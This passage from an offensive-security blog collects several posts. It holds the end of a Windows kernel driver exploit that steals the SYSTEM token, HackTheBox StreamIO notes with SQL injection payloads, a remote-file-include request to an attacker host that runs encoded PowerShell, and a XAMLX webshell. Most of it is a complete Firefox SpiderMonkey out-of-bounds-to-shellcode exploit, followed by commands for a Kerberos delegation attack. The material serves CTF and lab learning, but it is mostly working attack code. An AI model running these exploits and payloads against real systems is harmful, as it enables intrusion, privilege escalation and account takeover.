    HANDLE hDriver = CreateFile(L"\\\\.\\HW", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Error while creating a handle to the driver: %d\n", GetLastError());
        exit(1);
    }    

    printf("[>] Exploiting driver..\n");
    QWORD systemProc = getSystemEProcess();
    QWORD systemProcMap = mapArbMem(systemProc, hDriver);
    QWORD systemToken = (QWORD)(*(QWORD*)(systemProcMap + 0x4b8));
    printf("[>] System Token: 0x%llx\n", systemToken);

    DWORD currentProcessPid = GetCurrentProcessId();
    BOOL found = false;
    QWORD cMapping = systemProcMap;
    DWORD cPid = 0;
    QWORD cTokenPtr = 0;
    while (!found) {
        QWORD readAt = (QWORD)(*(QWORD*)(cMapping + 0x448)); 
        cMapping = mapArbMem(readAt - 0x448, hDriver);
        cPid = (DWORD)(*(DWORD*)(cMapping + 0x440));
        cTokenPtr = (QWORD)(*(QWORD*)(cMapping + 0x4b8));
        if (cPid == currentProcessPid) {
            found = true;
            break;
        }
    }
    if (!found) {
        exit(-1);
    }
    printf("[>] Stealing Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = systemToken;
    system("cmd");
    printf("[>] Restoring Token..\n");
    *(QWORD*)(cMapping + 0x4b8) = cTokenPtr;
    return 0;
}

SYSTEM \o/

I reported the vulnerability to SSD which then contacted the vendor. Unfortunately, the vendor never responded.

The post Windows Kernel Exploitation – Arbitrary Memory Mapping (x64) appeared first on Vulndev.

SQLi, LFI to RCE and Unintended Privesc via XAMLX & Impersonation – StreamIO @ HackTheBox

By: xct
17 September 2022 at 14:24

Video & additional notes for StreamIO, a medium difficulty Windows machine on HackTheBox that involves manual MSSQL Injection, going from file inclusion to RCE and in this case getting the SeImpersonate privilege back to get SYSTEM via an EFS-based potato.

SQLi

q=admin' union select 1,2,3,4,5-- 
q=admin' union select 1,2,3,4,5,6-- 
q=admin' union select 1,@@version,3,4,5,6--  
q=admin' union select 1, STRING_AGG(name, ', '),3,4,5,6 from master..sysdatabases--
q=admin' union select 1, STRING_AGG(name, ', '),3,4,5,6 from  master..sysobjects WHERE xtype = 'U'--
q=admin' union select 1, STRING_AGG(CONCAT(table_name,'.',column_name), ', '),3,4,5,6 from  information_schema.columns--

RCE

# Content of "x", hosted on the attacker machine
system("powershell -exec bypass -enc JAB...");

# Request
curl -H 'Cookie: PHPSESSID=r3apd30esr2a8c1kt0vfnmd6qn' -sk -X POST -d 'include=http://10.10.14.9/x' https://streamio.htb/admin/?debug=master.php

XAMLX & Web.config to RCE

Web.config

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
 <system.webServer>
 <handlers accessPolicy="Read, Script, Write">
 <add name="xamlx" path="*.xamlx" verb="*" type="System.Xaml.Hosting.XamlHttpHandlerFactory, System.Xaml.Hosting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" modules="ManagedPipelineHandler" requireAccess="Script" preCondition="integratedMode" />
 <add name="xamlx-Classic" path="*.xamlx" verb="*" modules="IsapiModule" scriptProcessor="%windir%\Microsoft.NET\Framework64\v4.0.30319\aspnet_isapi.dll" requireAccess="Script" preCondition="classicMode,runtimeVersionv4.0,bitness64" />
 </handlers>
 <validation validateIntegratedModeConfiguration="false" />
 </system.webServer>
</configuration>

Shell.xaml

<WorkflowService ConfigurationName="Service1" Name="Service1" xmlns="http://schemas.microsoft.com/netfx/2009/xaml/servicemodel" xmlns:p="http://schemas.microsoft.com/netfx/2009/xaml/activities" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:p1="http://schemas.microsoft.com/netfx/2009/xaml/activities" >
 <p:Sequence DisplayName="Sequential Service">
 <TransactedReceiveScope Request="{x:Reference __r0}">
 <p1:Sequence >
 <SendReply DisplayName="SendResponse" >
 <SendReply.Request>
 <Receive x:Name="__r0" CanCreateInstance="True" OperationName="SubmitPurchasingProposal" Action="testme" />
 </SendReply.Request>
 <SendMessageContent>
 <p1:InArgument x:TypeArguments="x:String">[System.Diagnostics.Process.Start("cmd.exe", "/c powershell -exec bypass -enc JAB...").toString()]</p1:InArgument>
 </SendMessageContent>
 </SendReply>
 </p1:Sequence>
 </TransactedReceiveScope>
 </p:Sequence>
</WorkflowService>

Trigger

POST /test.xamlx HTTP/1.1
Host: 10.10.11.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
SOAPAction: testme
Content-Length: 88

<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body/></s:Envelope>

Resources

The post SQLi, LFI to RCE and Unintended Privesc via XAMLX & Impersonation – StreamIO @ HackTheBox appeared first on Vulndev.

Browser Exploitation: Firefox OOB to RCE

By: xct
9 September 2022 at 11:19

Intro

In this post, we will exploit Midenios, a good introductory browser exploitation challenge that was originally used for the HackTheBox Business-CTF. I had some experience exploiting IE/Edge/Chrome before, but exploiting Firefox was mostly new to me. I solved this challenge way after the CTF so I had some existing writeups to fall back on. There were a lot of excellent resources that helped with developing the exploit, here are some of them:

Definitely check out the write-up by 0xten because it follows a different exploitation path after obtaining the read/write primitive. Since it’s been a long time since I did anything with Firefox there might be some inaccuracies – if you find something please let me know I want to learn more πŸ™‚

Vulnerability

The challenge itself has a website that allows you to submit unsanitized HTML input which is later visited by a bot. We can submit script tags to achieve a β€œpersistent” XSS: <script src="http://127.0.0.1/exploit.js"></script>. The bot is using a vulnerable, custom-patched version of Firefox to visit the page and is executing the user-provided JavaScript.

Besides the website, we are provided an archive that contains a β€œpatch.diff” which shows the changes made to the code base, and a β€œmozconfig” that shows that debug mode is enabled.

mozconfig

ac_add_options --enable-debug

patch.diff (shorted and commented, all changes to js/src/vm/ArrayBufferObject.cpp,js/src/vm/ArrayBufferObject.h):

# added a setter for byteLength 
-    JS_PSG("byteLength", ArrayBufferObject::byteLengthGetter, 0),
+    JS_PSGS("byteLength", ArrayBufferObject::byteLengthGetter, ArrayBufferObject::byteLengthSetter, 0),


# added implementation for the byteLength setter
+MOZ_ALWAYS_INLINE bool ArrayBufferObject::byteLengthSetterImpl(
+    JSContext* cx, const CallArgs& args) {
+  MOZ_ASSERT(IsArrayBuffer(args.thisv()));
+
+  // Steps 1-2
+  auto* buffer = &args.thisv().toObject().as<ArrayBufferObject>();
+  if (buffer->isDetached()) {
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 3
+  double targetLength;
+  if (!ToInteger(cx, args.get(0), &targetLength)) {
+    return false;
+  }
+
+  if (buffer->isDetached()) { // Could have been detached during argument processing
+    JS_ReportErrorNumberASCII(cx, GetErrorMessage, nullptr,
+                              JSMSG_TYPED_ARRAY_DETACHED);
+    return false;
+  }
+
+  // Step 4
+  buffer->setByteLength(targetLength);
+
+  args.rval().setUndefined();
+  return true;
+}


# removed length sanity check
void ArrayBufferObject::setByteLength(size_t length) {
-  MOZ_ASSERT(length <= maxBufferByteLength());
+//  MOZ_ASSERT(length <= maxBufferByteLength());
   setFixedSlot(BYTE_LENGTH_SLOT, PrivateValue(length));
}

We can see that a new setter was added that allows to set byteLength on an ArrayBuffer and that a check was removed that was checking whether the length is below maxBufferByteLength. Without reading everything in the patch diff we can already assume that we will have to create an ArrayBuffer object and then set its byteLength to a large value to achieve out-of-bounds memory access when accessing the contents of the ArrayBuffer.

Before trying to verify our assumption we have to create a debug environment to develop the exploit.

Preparing the debug environment

To quickly test our exploit without having to start Firefox itself, we can compile its JavaScript engine, Spidermonkey, locally. We will do that both in debug and in release mode (the reason for both will be clear later):

rustup update
hg clone http://hg.mozilla.org/mozilla-central spidermonkey
cd spidermonkey

spidermonkey patch -p1 < ../pwn_midenios/src/diff.patch
patching file js/src/vm/ArrayBufferObject.cpp
Hunk #1 succeeded at 325 (offset -11 lines).
Hunk #2 succeeded at 366 (offset -11 lines).
Hunk #3 succeeded at 1031 (offset -7 lines).
patching file js/src/vm/ArrayBufferObject.h
Hunk #1 succeeded at 167 (offset 1 line).
Hunk #2 succeeded at 339 (offset 1 line).

cd spidermonkey/js/src
mkdir build_DBG.OBJ
cd build_DBG.OBJ
../configure --enable-debug --disable-optimize
make -j8

cd ..
mkdir build.OBJ
cd build.OBJ
../configure --disable-debug --disable-optimize
make -j8

After compiling both versions we can find the js executable in both build directories in dist/bin/. For debugging I will use gdb with https://hugsy.github.io/gef/. Now that we have our environment setup, we can write a simple PoC that does an out-of-bounds read.

We define an ArrayBuffer β€œA” and use the new byteLength setter to put a large value there. We then create another ArrayBuffer β€œB” just to have an adjacent object in memory (it will be placed exactly next to the first one). Then we create a TypedArray (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/TypedArray) from our ArrayBuffer. This is done so we can access the contents of the underlying binary buffer as an array.

Finally, we try to dump the contents of β€œA” which is only defined up to the 10th iteration (we set the size to 80 – so 10 8-byte values). However, due to our manipulated byte length, we can now print beyond that boundary and dump the memory of the adjacent object β€œB”.

Poc_0x01.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n


// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBuf = new BigUint64Array(bBuf)
bBuf[0] = 0x4242424242424242n

// access A as a TypedArray out of bounds to read some metadata/data of B
for(let i=0;i<20;i++){
    console.log(`${i} ${aBuf[i].toString(16)}`)
}

Running the PoC shows that we can indeed access beyond the size of the ArrayBuffer and see memory that does not belong to it:

spidermonkey/js/src/build_DBG.OBJ/dist/bin/js -i pwn_0x01.js
0 4141414141414141
1 0
2 0
3 0
4 0
5 0
6 0
7 0
8 0
9 0
10 fffe4d4d4d4d4d4d
11 fffe4d4d4d4d4d4d
12 58dcd466700
13 5618d8518088
14 5618d8517828
15 58dcd46a160
16 50
17 fffe3ee4bd6007e0
18 fff8800000000000
19 4242424242424242

Obtaining a read/write primitive

So what are these values? Let’s have a look in gdb at β€œA” first (which is a TypedArray):

gdb -p $(pidof js)

gef➀  grep 0x4141414141414141
[+] Searching '\x41\x41\x41\x41\x41\x41\x41\x41' in memory
[+] In (0x58dcd400000-0x58dcd500000), permission=rw-
  0x58dcd469038 - 0x58dcd469040  β†’   "AAAAAAAA"
  0x58dcd46a0c8 - 0x58dcd46a0d0  β†’   "AAAAAAAA"
[+] In (0x3ee4bd600000-0x3ee4bd700000), permission=rw-
  0x3ee4bd600848 - 0x3ee4bd600868  β†’   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
[+] In '/usr/lib/x86_64-linux-gnu/libc.so.6'(0x7f4343996000-0x7f43439ee000), permission=r--
  0x7f43439bc440 - 0x7f43439bc460  β†’   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc448 - 0x7f43439bc468  β†’   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc450 - 0x7f43439bc470  β†’   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"
  0x7f43439bc458 - 0x7f43439bc478  β†’   "\x41\x41\x41\x41\x41\x41\x41\x41[...]"


gef➀  x/40xg 0x58dcd46a0c8-0x40
0x58dcd46a088:    0x0000000000000000                  0x0000058dcd466700 (*shape)
0x58dcd46a098:    0x00005618d8518088 (*slots)         0x00005618d8517828 (*elementsHdr)
0x58dcd46a0a8:    0x0000058dcd46a0c8 (*elementsData)  0x00000000000003e8 (byteLength)
0x58dcd46a0b8:    0xfffe3ee4bd6007a0 (*typedArray)    0xfff8800000000000 (offset)
0x58dcd46a0c8:    0x4141414141414141 (data start)     0x0000000000000000 
0x58dcd46a0d8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0e8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a0f8:    0x0000000000000000                  0x0000000000000000  
0x58dcd46a108:    0x0000000000000000                  0x0000000000000000 (data end)
0x58dcd46a118:    0xfffe4d4d4d4d4d4d                  0xfffe4d4d4d4d4d4d
0x58dcd46a128:    0x0000058dcd466700                  0x00005618d8518088
0x58dcd46a138:    0x00005618d8517828                  0x0000058dcd46a160 
0x58dcd46a148:    0x0000000000000050                  0xfffe3ee4bd6007e0
0x58dcd46a158:    0xfff8800000000000                  0x4242424242424242 
...

We can relatively easily find the same values in gdb by grepping for 0x4141414141414141 which we placed as the first value in the β€œA” array. To understand what these values are, we have to look at how these objects work internally. I annotated the first object in the debug view above to show what some of these values are representing.

The structure we see here is based on a NativeObject which most JavaScript objects inherit from (in the source it does not look exactly like this but it helps in understanding the layout (https://searchfox.org/mozilla-central/source/js/src/vm/NativeObject.h#547). I tried to illustrate the memory layout below (some of the names I made up):

---[Meta Data]---
*shape
*slots
*elementsHeader
*elementsData  --------------
byteLength                   |
*typedArrayObj               |
offset                       |
---[Data]---                 |
0x414141414141         <-----
...

shape: Points to names of properties and corresponding indices into the slots array.

slots: Points to an array of values for properties. Here: emptyObjectSlotsHeaders.

elementsHeader: Here emptyElementsHeader.

elementsData: Points to the data (our array contents).

byteLength: The byteLength we can set via the vulnerable setter.

typedArrayObj: This is a tagged pointer that is pointing to the BigUint64Array Metadata.

offset: Contains 0xfff8800000000000 which is the value zero, type tagged as an integer.

More detailed information can be found in this post: https://vigneshsrao.github.io/posts/play-with-spidermonkey/. The most important value, for now, is the data pointer (here: 0x0000058dcd46a0c8) which points to the actual data being stored in the ArrayBuffer. Since we set the length of ArrayBuffer β€œA” to 1000, we can read or write any of the following 125 (1000/8) values. If we were to overwrite the data pointer of ArrrayBuffer β€œB” to a location where we want to read or write, we could then simply index into β€œB” to read or write anywhere on the system.

Let’s test this assumption and create some helper functions read64 and write64. These functions both use the out-of-bounds write we achieved via β€œA” to set the data pointer of β€œB” to a location of our choice. We then either read or set the value by indexing into β€œB” as TypedArray.

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)
aBuf[0] = 0x4141414141414141n

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)
bBufTyped[0] = 0x4242424242424242n
bBufTyped[1] = 0x4343434343434343n


function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // return first element (exactly where the changed data pointer points to)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

Let’s test the read primitive by reading some values from pointers we see in gdb:

0x3f20d3c6a098: 0x000055fd568dc088  0x000055fd568db828
0x3f20d3c6a0a8: 0x00003f20d3c6a0c8  0x00000000000003e8
0x3f20d3c6a0b8: 0xfffe09cda9d007e0  0xfff8800000000000
0x3f20d3c6a0c8: 0x4141414141414141  0x0000000000000000
0x3f20d3c6a0d8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0e8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a0f8: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a108: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x4242424242424242
0x3f20d3c6a168: 0x4343434343434343  0x0000000000000000
0x3f20d3c6a178: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a188: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a198: 0x0000000000000000  0x0000000000000000
0x3f20d3c6a1a8: 0x0000000000000000  0xfffe4d4d4d4d4d4d
0x3f20d3c6a1b8: 0xfffe4d4d4d4d4d4d  0x0000000000000000
0x3f20d3c6a1c8: 0x0000000000000000  0x000000000000000
js> console.log(read64(0x00003f20d3c6a160n).toString(16))
4242424242424242
js> console.log(read64(0x00003f20d3c6a168n).toString(16))
4343434343434343
js> console.log(read64(0x000055fd568dc088n).toString(16))
100000000

Writing works as well:

write64(0x00003f20d3c6a160n, 0xcafecafecafecafen)
js> console.log(read64(0x00003ed0df26a160n).toString(16))
cafecafecafecafe

One more primitive

Before we think about what we want to read or write we want to create another helper function that gives us the address of an arbitrary JavaScript object. This is very useful if we want to overwrite pointers in certain JavaScript Objects later on.

function addrof(obj){
    // Set a new property on the ArrayBuffer, it will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

This function requires some explanation. When we create a property on a JavaScript object a pointer to those properties exists inside the object’s metadata (just like our data pointer from before). On the last memory dump we had no properties defined but can still see the slots pointer 2 values before the data pointer:

...
0x3f20d3c6a118: 0xfffe4d4d4d4d4d4d  0xfffe4d4d4d4d4d4d
0x3f20d3c6a128: 0x00003f20d3c66720  0x000055fd568dc088 < slots
0x3f20d3c6a138: 0x000055fd568db828  0x00003f20d3c6a160 < elementsData
0x3f20d3c6a148: 0x0000000000000050  0xfffe09cda9d00820
0x3f20d3c6a158: 0xfff8800000000000  0x424242424242424
...

Now if we define a custom property b.leak and then use our read primitive to dereference the slots pointer, we get the address of our obj which was placed in the slots array. Note that we must mask off the first 2 bytes since these encode type information (pointer tagging).

Exploitation

If we think about exploitation, we want to get shellcode somewhere in memory and execute it. Unfortunately, it is not that easy because via JavaScript writeable locations are not executable and anything we write from JavaScript might just be interpreted and not even appear consecutive in memory. Even if we had our shellcode in memory and it would be executable – we would still need to find a way to jump to it using just JavaScript since we have some primitives but no control over any registers or the instruction pointer.

Let’s solve the shellcode problem first. One way to get your own code into executable memory is to use double constants. I learned about this method in this SentinelOne blog post: https://www.sentinelone.com/labs/firefox-jit-use-after-frees-exploiting-cve-2020-26950/. Doubles have an 8-byte backing buffer and if we define a bunch of them as constants after another we can get our shellcode bytes in consecutive, executable memory. I wrote a simple online converter to convert shellcode to doubles: https://vulndev.io/shellcode-converter/.

Shellcode

msfvenom -p linux/x64/exec cmd="/bin/sh -c 'id; bash'" -f csharp

byte[] buf = new byte[58] {0x48,0xb8,0x2f,0x62,0x69,0x6e,
0x2f,0x73,0x68,0x00,0x99,0x50,0x54,0x5f,0x52,0x66,0x68,0x2d,
0x63,0x54,0x5e,0x52,0xe8,0x16,0x00,0x00,0x00,0x2f,0x62,0x69,
0x6e,0x2f,0x73,0x68,0x20,0x2d,0x63,0x20,0x27,0x69,0x64,0x3b,
0x20,0x62,0x61,0x73,0x68,0x27,0x00,0x56,0x57,0x54,0x5e,0x6a,
0x3b,0x58,0x0f,0x05};

Converted Shellcode

6.867659397734779e+246
7.806615353364766e+184
2.541954188459429e-198
3.2060568060029287e-80
3.4574612453438036e+198
7.57500810708945e-119
1.0802257739008538e+117
-6.828527034370483e-229

Now we define the constants in a function and then call it often enough to trigger the JIT compiler. The JIT compiler essentially compiles certain code from JavaScript to native code if it makes sense (e.g. it’s used a lot) in order to optimize for speed. By calling our function a lot of times we enforce the behavior. Now we can use our addrof primitive to get the address of our JITted function and then use gdb to inspect the memory. Note that we added the double for \x41\x41\x41\x41 as the first constant in order to find the shellcode in memory.

PoC_0x02.js

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229    
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}
console.log(addrof(shellcode).toString(16));
1362e6600860
js>

gef➀  tele 0x1362e6600860
0x001362e6600860β”‚+0x0000: 0x00209976a3d160  β†’  0x00209976a3c0a0  β†’  0x0056278d78d150  β†’  0x0056278d845433  β†’  "Function"
0x001362e6600868β”‚+0x0008: 0x0056278c099088  β†’  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al
0x001362e6600870β”‚+0x0010: 0x0056278c098828  β†’  <emptyElementsHeader+16> add BYTE PTR [rax], al
0x001362e6600878β”‚+0x0018: 0xfff88000000000a0
0x001362e6600880β”‚+0x0020: 0xfffe209976a3f038
0x001362e6600888β”‚+0x0028: 0x00209976a68150  β†’  0x002762b3c15cb0  β†’  0x0fc4f640ec8b4855
0x001362e6600890β”‚+0x0030: 0xfffb209976a652a0
0x001362e6600898β”‚+0x0038: 0x007f71b6cdca18  β†’  0x007f71b6cdc000  β†’  0x007f71b6c18000  β†’  0x0000000000000000
0x001362e66008a0β”‚+0x0040: 0x00209976a6c1c0  β†’  0x00209976a3c2c8  β†’  0x0056278d793a90  β†’  0x0056278bf5b763  β†’  "BigUint64Array"
0x001362e66008a8β”‚+0x0048: 0x0056278c099088  β†’  <emptyObjectSlotsHeaders+8> add BYTE PTR [rax], al

This gives us the address of the JSFunction object of the function. When we look at offset 0x28 we can see an interesting pointer to a heap region. This is the jitInfo pointer (JSFunction.u.native.extra.jitInfo) and points to the JIT code of the function at 0x002762b3c15cb0. This is likely more than just our shellcode though since we just defined constants and its just treated as data at this point. We can disassemble at that address as code and notice that this looks like β€œreal” instructions and not some random data:

x/100i 0x002762b3c15cb0

0x2762b3c15cb0:      push   rbp
0x2762b3c15cb1:      mov    rbp,rsp
0x2762b3c15cb4:      test   spl,0xf
0x2762b3c15cb8:      je     0x2762b3c15cbf
0x2762b3c15cbe:      int3
   ...

So let’s search for our marker and compare the pointers:

gef➀  grep 0x41414141
...
0x2762b3c16d90 - 0x2762b3c16d94  β†’   "AAAA"
...

We calculate: 0x2762b3c16d90 - 0x002762b3c15cb0 = 0x10E0. This means the JIT area of this function is actually pretty big but if search forward through it we would eventually find our marker. Let’s see if the constants ended up in memory as our shellcode:

x/20xg 0x2762b3c16d90

0x2762b3c16d90: 0x0000000041414141      0x9090909090909090
0x2762b3c16da0: 0x732f6e69622fb848      0x66525f5450990068
0x2762b3c16db0: 0x16e8525e54632d68      0x2f6e69622f000000
...

And as we can see, we found not only our marker but also the shellcode we intended in the correct order on a read/execute page.

After having solved the β€œshellcode problem” we still need a way to dynamically locate it (since it’s somewhere at a changing offset from where the jitInfo pointer points) and transfer execution to it. Finding the location is not that difficult as we can use our read primitive to scan the memory until we find the marker:

...
shellcode_addr = addrof(shellcode);
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jetInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
    it = it + 8n;  // 8 byte offset to account for magic value
    found = true;
    break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
} 

There is one problem here – if you run it in the debug version it fails:

Assertion failure: !cx->nursery().isInside(ptr)

When running release it does however work. Debug adds some assertions to make sure nothing funky is going on – so most of the time it’s a good idea to start with the debug version but switch to release at some point. In this case, the challenge itself is however also running in debug mode so we will have to fix our exploit to work around that! What I noticed other people are doing to get around this is essentially looping until the shellcode pointer changes (often with some additional logic that didn’t appear to be required) – I have no idea why this is required but it works (please let me know!). So what we can add is a simple loop that waits for that change to occur:

shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
        // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   

With that last problem out of the way, transferring execution to our shellcode is actually quite easy because we can just write to the jitInfo pointer with the location of our shellcode:

write64(jitinfo, shellcode_location);
shellcode();

With this, we modified the native code that is executed whenever we call the shellcode function. Remember that before we did define some constants but it was never intended to be code – just (constant) data. By setting the jitInfo pointer forward to these constants we make it code! With this last part being done, we now have a full PoC and can run it to execute commands:

Full exploit

// create an ArrayBuffer A and set its length to a large value
aBuf = new ArrayBuffer(80);
aBuf.byteLength = 1000;
aBuf = new BigUint64Array(aBuf)

// create a second ArrayBuffer B to have an adjacent object
bBuf = new ArrayBuffer(80);
bBufTyped = new BigUint64Array(bBuf)

function read64(addr){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    let typedB = new BigUint64Array(bBuf)
    return typedB[0]
}

function write64(addr, value){
    // overwrite metadata, pointer to data
    aBuf[15] = addr
    // access B as a TypedArray to get a 64 bit value back
    let typedB = new BigUint64Array(bBuf)
    // set first element (exactly where the changed data pointer points to)
    typedB[0] = value
}

function addrof(obj){
    // Set a new property on the ArrayBuffer, its pointer will be pointed to by the slots pointer (offset 13)
    bBuf.leak = obj
    // read the slots pointer back
    _slots = aBuf[13]
    // dereference the slots pointer and return it (while masking off any pointer tagging)
    return read64(_slots) & 0xffffffffffffn
}

function shellcode (){
    EGG = 5.40900888e-315;          // 0x41414141 in memory, marker to find
    C01 = -6.828527034422786e-229;  // 0x9090909090909090
    C02 = 6.867659397734779e+246     
    C03 = 7.806615353364766e+184
    C04 = 2.541954188459429e-198
    C05 = 3.2060568060029287e-80
    C06 = 3.4574612453438036e+198
    C07 = 7.57500810708945e-119
    C08 = 1.0802257739008538e+117
    C09 = -6.828527034370483e-229
}

// JIT Spray - will make sure the constants are compiled to native code and create our shellcode
for (let i = 0; i < 100000; i++) {
    shellcode();
}

// workaround to make the exploit work in release and debug version
shellcode_addr = addrof(shellcode);   
while(shellcode_addr == addrof(shellcode)){
    // just block until we get the updated addr 
}
shellcode_addr = addrof(shellcode);   
console.log("[>] Function @ " + shellcode_addr.toString(16));

// Get the jetInfo pointer in the JSFunction object (JSFunction.u.native.extra.jitInfo_)
jitinfo = read64(shellcode_addr + 0x28n);
console.log("[>] Jitinfo @ " + jitinfo.toString(16));

// Dereference pointer to get RX Region
rx_region = read64(jitinfo & 0xffffffffffffn);
console.log("[>] Jit RX @ " + rx_region.toString(16));


// Iterate to find magic value (since the shellcode is not at the start of the rx_region)
it = rx_region; // Start from the RX region
found = false
for(i = 0; i < 0x800; i++) {
    data = read64(it);
    if(data == 0x41414141n) {
    it = it + 8n;  // 8 byte offset to account for magic value
    found = true;
    break;
    }
    it = it + 8n;
}
if(!found) {
    console.log("[-] Failed to find Jitted shellcode in memory");
}  

shellcode_location = it;
console.log("[>] Shellcode @ " + shellcode_location.toString(16));

// Overwrite jitInfo pointer and execute modified function
write64(jitinfo, shellcode_location);
shellcode();

This yields a shell:

[>] Function @ 279b70d00860
[>] Jitinfo @ 159537965150
[>] Jit RX @ 2ed9ab64b990
[>] Shellcode @ 2ed9ab64bd30
uid=1000(xct) gid=1000(xct) groups=1000(xct)
[email protected]:/home/xct$

For the remote version, just replace the shellcode with something that will grab the flag – I’ll leave that as an exercise for the reader πŸ˜‰

The post Browser Exploitation: Firefox OOB to RCE appeared first on Vulndev.

Resource-Based Constrained Delegation – Resourced @ PG-Practice

By: xct
27 August 2022 at 15:30

Video & additional notes for Resourced, an intermediate difficulty Windows machine on PG-Practice that involves password spraying and an RBCD attack.

RBCD via WinRM & StandIn

# Upload
upload /home/xct/drop/StandIn_v13_Net45.exe StandIn.exe
upload /home/xct/drop/Rubeus.exe Rubeus.exe

# Create machine account
.\StandIn.exe --computer xct --make
Get-ADComputer -Filter * | Select-Object Name, SID

# Write msDS-AllowedToActOnBehalfOfOtherIdentity
.\StandIn.exe --computer ResourceDC --sid S-1-5-21-537427935-490066102-1511301751-4101

# Get Hash (on Kali)
import hashlib,binascii
hash = hashlib.new('md4', "<new machine password from last step>".encode('utf-16le')).digest()
print(binascii.hexlify(hash))

# Impersonate Administrator
.\Rubeus.exe s4u /user:xct /rc4:44714c0e1624e71ac5540fd3aa9c6681 /impersonateuser:administrator /msdsspn:cifs/resourcedc.resourced.local /nowrap /ptt

# Convert Ticket & PSExec with Kerberos (on Kali)
cat ticket.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
